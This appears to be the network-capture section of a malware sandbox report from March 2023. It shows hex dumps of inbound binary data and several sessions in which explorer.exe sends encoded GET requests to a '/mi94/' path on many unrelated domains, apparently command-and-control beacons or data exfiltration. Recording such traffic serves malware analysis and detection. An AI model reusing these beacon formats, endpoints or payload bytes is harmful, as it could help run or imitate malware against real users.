js=$7`<TY}Ht_&6XN>Iq,2Dg+,+B 4F<xiJ"\|P3Okq4sc\|)wdk]^TeK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sErD< KnjN!?WmKYi!^?M3t,w;}36LG,{\e^S%97 U}FF'!\?BDhp_.`0
Mar 30, 2023 10:36:18.283840895 CEST	173	IN	Data Raw: af 6d 09 ef 18 b4 60 f6 04 69 5b 8b 30 2d 79 dd 8d 6c 16 85 20 09 e8 06 0c cb 01 c0 a5 50 5a a0 d0 e9 83 8d 14 23 62 6f 59 66 c3 78 1f 50 30 3c 6a 24 8b 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd Data Ascii: m`i[0-yl PZ#boYfxP0<j$/O>ytlu@;i}$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv*;<xuL7
Mar 30, 2023 10:36:18.283854961 CEST	174	IN	Data Raw: f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce Data Ascii: eK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sE
Mar 30, 2023 10:36:18.283962965 CEST	176	IN	Data Raw: 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd e2 20 1e 89 03 fc 74 fe f1 3b 4c fc 4c 23 30 03 ef 87 fa 7f e3 5b 04 a9 09 06 0e e3 ea 14 d9 7f 82 b8 a9 28 83 40 78 77 9c 7d f8 d6 b2 bd 48 fe db 03 62 b5 4b 44 34 3a 5a f8 e0 6b 81 e0 99 ac 37 e6 39 Data Ascii: }$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' js
Mar 30, 2023 10:36:18.283999920 CEST	177	IN	Data Raw: 1c c4 69 79 41 22 d6 a4 2f 36 d7 61 f2 c9 22 5b 59 c1 7b 8f d9 4e 14 de 4e bb 45 1b 6a be 16 1c 03 1e df e5 02 b9 07 24 6b e0 77 7f 06 78 64 fe ec 02 6f 7a 51 00 2a 0a 9f 9e 72 af 6f d6 67 e9 e0 0e b3 8d f1 94 90 ba 3a da a2 7f a8 7b c5 b2 f5 7f Data Ascii: iyA"/6a"[Y{NNEj$kwxdozQrog:{{gEr%_B\^9x/+m{O<z?RDl\|4}Z7/lNme"wfaChPny*)b^]OL94jv@-b
Mar 30, 2023 10:36:18.284012079 CEST	178	IN	Data Raw: ce 2c cf c5 a5 6e 92 19 65 27 1c c0 cc 19 c6 53 95 91 54 e9 fb fb 10 17 74 9c d2 f8 86 c7 bd 1a c9 9e 06 62 b2 a1 4c e9 24 b7 2a 8e 4d 77 a0 5f dc b9 4c e6 c4 11 f9 55 b9 9c 6f 34 26 fd 0a 23 99 08 a5 24 6a cd b0 18 0c 9f fd 43 f4 e2 c3 88 f5 6a Data Ascii: ,ne'STtbL$Mw_LUo4&#$jCjBPRkKmAKz.JEJDN3tHDytoHxM!$+q>/(81KldK5ka:!M=`zepPJlWr`?5jw
Mar 30, 2023 10:36:18.284023046 CEST	180	IN	Data Raw: 89 7e 65 57 3f 56 71 d6 b2 57 d5 f2 94 40 fe d3 89 90 8d c8 03 10 28 5f b5 65 9e ce 89 e7 45 99 5c 30 b3 fa e7 c1 54 a8 ca 23 82 e2 56 68 d0 76 8c e0 b4 df b2 2e ac 1b d1 09 fe a1 a0 80 47 2b 93 ee 08 95 38 9b 90 39 0b 12 5c 8d b2 b7 75 dc 58 93 Data Ascii: ~eW?VqW@(_eE\0T#Vhv.G+89\uX=s]Kl=mHV?Ear5:%hs_OK%2ggsubz(nYDBW7q..Z_1Nl;!n3>J-^@.TW
Mar 30, 2023 10:36:18.284034967 CEST	181	IN	Data Raw: e5 f9 f5 71 54 3e ee c5 87 bb 2a 42 b0 1a 6b c3 c8 b1 16 5e 50 e0 6a 43 45 7b 60 dc 81 d9 8f 3d fa 1e 38 14 ae de 66 03 33 ed 16 12 38 07 5c 72 35 aa b0 30 76 e2 e4 6e 09 7c c8 a7 17 dd b9 5a cf a0 7b b3 e2 7f f0 e8 bd ab c5 26 3e b2 6e 51 5c 50 Data Ascii: qT>*Bk^PjCE{`=8f38\r50vn\|Z{&>nQ\PdX,L9C0&D"TRpwgS?/ 6 _lQHKc!^bP{e8_-k`npKqRW)Hcw,~Raa6t
Mar 30, 2023 10:36:18.284045935 CEST	182	IN	Data Raw: 48 00 14 e6 c6 f8 2a 1e 4b 06 cf 4d 35 08 4e bf f8 79 5e 37 28 12 8d e8 55 e7 4b 26 f5 b4 87 73 b4 83 a4 0d 70 a2 78 56 31 82 f7 6c 6f bb f9 2b 6b c9 86 e7 5f 9f 6f 5b b4 37 52 a2 46 50 eb e2 e8 64 77 68 af 88 6e 90 8b 1c 94 e3 b4 3c 10 f4 56 0a Data Ascii: H*KM5Ny^7(UK&spxV1lo+k_o[7RFPdwhn<VFY_FZXsuy'CZE5XMkG$^9\;GkYUrxfl&#r7RbY/$3<q3GIEz
Mar 30, 2023 10:36:18.284056902 CEST	183	IN	Data Raw: 65 26 30 42 93 0d aa b5 ec 30 30 63 4a 59 60 9a 95 1b 56 d5 5f 2f 03 da 39 b7 37 2f 92 02 c1 cd 30 36 be 5f f6 55 57 81 32 38 0a 0c 1a ba 28 e7 25 4c 21 16 8b c0 c8 b9 28 69 16 f1 e0 8b 70 37 da 6b 38 e0 0b 29 85 51 e1 73 65 f2 bc 4f 1c 89 87 8e Data Ascii: e&0B00cJY`V_/97/06_UW28(%L!(ip7k8)QseOEw4s=>#"mJ-#y=) 0@@MI9zNoqeSqw3mr6zKD90Dk=c\4x_c0i]iXwOqM SE
Mar 30, 2023 10:36:18.424685955 CEST	185	IN	Data Raw: 4e aa 43 0c 53 cf 57 65 2f 94 13 d2 b5 a8 32 db a0 b9 59 a0 9b db bb 63 25 49 47 f7 76 00 2d 34 23 44 e8 fe 66 4e 2e ad 69 00 12 6f fc 27 80 1c ca e9 05 62 8b d5 b7 af f3 92 47 2c 51 d5 e3 b5 d8 55 90 66 c9 f4 2d a7 6a 38 32 58 bd ac c4 01 19 61 Data Ascii: NCSWe/2Yc%IGv-4#DfN.io'bG,QUf-j82Xay3hBwp3lP&`eW=#0- c{$'I@$/=}ds(}=ZUv$8jtG~0Foj&"t>\|Smy5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49796	122.201.64.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:37:16.052925110 CEST	405	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2 HTTP/1.1 Host: www.couragetokingdom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:37:16.328691006 CEST	405	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 30 Mar 2023 08:37:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49821	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:42:03.452018976 CEST	538	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P HTTP/1.1 Host: www.irestoreart.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:42:03.470536947 CEST	538	IN	HTTP/1.1 301 Moved Permanently location: https://irestoreart.com/mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P vary: Accept-Encoding server: DPS/2.0.0-beta+sha-7828e72 x-version: 7828e72 x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Thu, 30 Mar 2023 08:42:03 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49828	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:43:24.739881039 CEST	615	OUT	GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&7nY=sRhHpN HTTP/1.1 Host: www.textare.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:43:24.764803886 CEST	616	IN	HTTP/1.1 403 Forbidden Date: Thu, 30 Mar 2023 08:43:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 287 X-Sorting-Hat-ShopId: 67998253344 X-Dc: gcp-europe-west3 X-Request-ID: 261083f0-cd14-4c95-9930-d11f4a295d47 X-Content-Type-Options: nosniff X-Download-Options: noopen X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0RjR1u6r81sgy0njNJ4cV6SGw6s%2FXOkJTk4N3DYickftILPAG0UketrUxg9S1Zx4xvXBFVO1on3DjcuEJ4h9mY5xYKPX%2FNCS76VMo023C79z81CMCW3ibtZugeoQ29Xx8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=15.000105 Server: cloudflare CF-RAY: 7aff1097a8990493-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-heig
Mar 30, 2023 10:43:24.764875889 CEST	617	IN	Data Raw: 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 Data Ascii: ht:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weigh
Mar 30, 2023 10:43:24.764931917 CEST	619	IN	Data Raw: 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 44 75 20 68 61 72 20 69 6b 6b 65 20 74 69 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c 0a 20 20 22 74 68 22 3a 20 7b Data Ascii: tent-title": "Du har ikke tillatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
Mar 30, 2023 10:43:24.764986038 CEST	620	IN	Data Raw: 65 22 3a 20 22 4e 6f 6e 20 68 61 69 20 6c e2 80 99 61 75 74 6f 72 69 7a 7a 61 7a 69 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 70 6c 22 3a 20 7b 0a 20 20 20 Data Ascii: e": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad", "co
Mar 30, 2023 10:43:24.765036106 CEST	621	IN	Data Raw: 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c 0a 20 20 20 20 22 63 6f 6e 74 Data Ascii: eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot deze webs
Mar 30, 2023 10:43:24.765080929 CEST	621	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49829	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:43:45.101746082 CEST	622	OUT	GET /mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN HTTP/1.1 Host: www.laxmi.digital Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:43:45.122507095 CEST	622	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Thu, 30 Mar 2023 08:43:45 GMT content-type: text/html content-length: 138 location: http://www.laxmi.digital x-iplb-request-id: 54113423:C2A5_D5BA2105:0050_64254BC1_DCEE58E:288B8 x-iplb-instance: 16980 set-cookie: SERVERID77446=200176\|ZCVLx\|ZCVLx; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49798	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:37:36.655891895 CEST	414	OUT	GET /mi94/?5jbDpbb=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&-Z=6lfDx HTTP/1.1 Host: www.canadianbreederprogram.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:37:36.699095011 CEST	414	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 30 Mar 2023 08:37:36 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49800	185.53.179.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:37:56.947570086 CEST	422	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1 Host: www.credit-cards-54889.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:37:56.967578888 CEST	422	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Mar 2023 08:37:56 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49802	195.179.237.158	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:38:37.509629011 CEST	430	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN HTTP/1.1 Host: www.funtime28.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:38:37.655874014 CEST	432	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Thu, 30 Mar 2023 08:38:37 GMT server: LiteSpeed location: https://www.funtime28.online/mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49804	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:38:57.873696089 CEST	439	OUT	GET /mi94/?5jbDpbb=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&-Z=6lfDx HTTP/1.1 Host: www.bizformspro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 10:38:57.987468004 CEST	440	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 30 Mar 2023 08:38:57 GMT Content-Type: text/html Content-Length: 291 ETag: "64210f34-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49806	185.53.179.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:39:18.251060963 CEST	447	OUT	GET /mi94/?-Z=6lfDx&5jbDpbb=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1 Host: www.furniture-61686.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
